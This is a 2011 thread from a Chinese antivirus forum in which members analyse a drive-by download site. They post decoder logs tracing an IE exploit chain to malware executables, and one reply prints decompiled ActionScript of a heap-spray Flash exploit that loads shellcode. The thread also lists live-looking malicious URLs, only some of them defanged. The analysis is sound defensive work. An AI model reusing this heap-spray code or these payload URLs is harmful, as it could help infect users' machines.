查看: 2087|回复: 10
收起左侧

[其它] 挂马网站 [已检测 by ˇじ☆ve塗]

[复制链接]
仰望_星空
发表于 2011-5-6 13:39:50 | 显示全部楼层 |阅读模式
本帖最后由 ˇじ☆ve塗 于 2011-5-30 01:09 编辑

               hxxp://www.80tq.cn/80/attachment/201103/i.html
             hXXp://www.200wwj.cn/mhxy/flash.htm



Log generated by ˇじ☆ve塗 use mdecoder 0.67
[root] http://www.80tq.cn/80/attachment/201103/i.html(Exploit.Ie0dayCVE0806.a)
    [script]http://js.users.51.la/4696554.js
    [iframe]http://www.200wwj.cn/mhxy/flash.htm
        [flash]http://www.200wwj.cn/mhxy/nb.swf
    [virus]http://www.3qjc.com/bbs/forumdata/201.exe



http://www.200wwj.cn/mhxy/flash.htm 日志

11.jpg

cninguy
发表于 2011-5-6 13:57:35 | 显示全部楼层
本帖最后由 是昔流芳 于 2011-5-6 19:01 编辑

地址如下
Log generated by cninguy use mdecoder 0.67
[root] hXXp://www.80tq.cn/80/attachment/201103/i.html(Exploit.Ie0dayCVE0806.a)
    [script]http://js.users.51.la/4696554.js
    [iframe]http://www.200wwj.cn/mhxy/flash.htm
        [flash]http://www.200wwj.cn/mhxy/nb.swf
    [virus]http://www.3qjc.com/bbs/forumdata/201.exe
仰望_星空
 楼主| 发表于 2011-5-6 14:00:37 | 显示全部楼层
cninguy 发表于 2011-5-6 13:57
地址如下
Log generated by cninguy use mdecoder 0.67
[root] http://www.80tq.cn/80/attachment/201103 ...

[iframe]http://www.200wwj.cn/mhxy/flash.htm
也有问题
always
发表于 2011-5-6 14:42:12 | 显示全部楼层
关于:hxxp://www.80tq.cn/80/attachment/201103/i.html解密的日志(全体输出 -  5):

Level  0>hxxp://www.80tq.cn/80/attachment/201103/i.html
Level  1>hxxp://www.200wwj.cn/mhxy/flash.htm
Level  2>hxxp://www.200wwj.cn/mhxy/nb.swf ●
Level  2>hxxp://www.200wwj.cn/mhxy/mhxy.exe ●
Level  1>hxxp://www.3qjc.com/bbs/forumdata/201.exe ●

日志由 Redoce2.1第20次修正版于 2011/5/6 14:40:15 生成。
是昔流芳
发表于 2011-5-6 17:48:15 | 显示全部楼层
以后注意禁用URL识别,别人误点就不好了.
仰望_星空
 楼主| 发表于 2011-5-6 18:10:01 | 显示全部楼层
回复 5楼 是昔流芳 的帖子

好的,了解
cninguy
发表于 2011-5-6 18:40:25 | 显示全部楼层
回复 5楼 是昔流芳 的帖子

试试我那个吧,怎么把tt改为xx还是木有用呢
知微
发表于 2011-5-6 18:45:24 | 显示全部楼层
NORTON阻止了
仰望_星空
 楼主| 发表于 2011-5-6 18:48:05 | 显示全部楼层
cninguy 发表于 2011-5-6 18:40
回复 5楼 是昔流芳 的帖子

试试我那个吧,怎么把tt改为xx还是木有用呢

在网址的最后的地方按删除就可以了
是昔流芳
发表于 2011-5-6 18:59:22 | 显示全部楼层
本帖最后由 是昔流芳 于 2011-5-6 19:00 编辑

回复 7楼 cninguy 的帖子

除了always,你们两位未把http://www.200wwj.cn/mhxy/mhxy.exe解出.http://www.200wwj.cn/mhxy/flash.htm中的内容可能看不出什么,但请不要忽略nb.swf的内容.提取里面动作对象的代码.
package sdfasdf_fla
{
   
import flash.display.*;
   
import flash.events.*;
   
import flash.net.*;
   
import flash.utils.*;

   
dynamic public class MainTimeline extends MovieClip
   
{
        
public var a:String;
        
public var i:Object;
        
public var b:String;
        
public var loader:Loader;
        
public var t:String;
        
public var len:Object;
        
public var ul:URLLoader;
        
public var array:Array;

        
public function MainTimeline()
        {
            
addFrameScript(0, this.frame1);
            
return;
        }
// end function

        
function frame1()
        {
            
this.a = unescape("%u0d0d%u0d0d");
            
this.t = this.a;
            
this.b = unescape(stage.loaderInfo.parameters.sc);
            
this.len = 1048576 - this.b.length - 256;
            
while (this.a.length < this.len)
            {
               
               
this.a = this.a + this.t;
            }
            
this.a = this.a + this.b;
            
this.array = new Array();
            
this.i = 0;
            
while (this.i < 200)
            {
               
               
this.array[this.i] = new ByteArray();
               
this.array[this.i].writeMultiByte(this.a, "unicode");
               
var _loc_1:String = this;
               
var _loc_2:* = this.i + 1;
               
_loc_1.i = _loc_2;
            }
            
this.ul = new URLLoader();
            
this.ul.dataFormat = URLLoaderDataFormat.BINARY;
            
this.ul.addEventListener(Event.COMPLETE, this.onComplete);
            
this.ul.load(new URLRequest("encoded.swf"));
            
this.loader = new Loader();
            
addChild(this.loader);
            
trace("xxxxxxxxxxxxxxxxx");
            
return;
        }
// end function

        
public function onComplete(event:Event) : void
        
{
            
var _loc_2:* = (event.target as URLLoader).data;
            
_loc_2.uncompress();
            
this.loader.loadBytes(_loc_2);
            
return;
        }
// end function

   
}
}

根据这段代码可对http://www.200wwj.cn/mhxy/flash.htm进行解密,得到http://www.200wwj.cn/mhxy/mhxy.exe.
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-1 01:17 , Processed in 0.135482 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表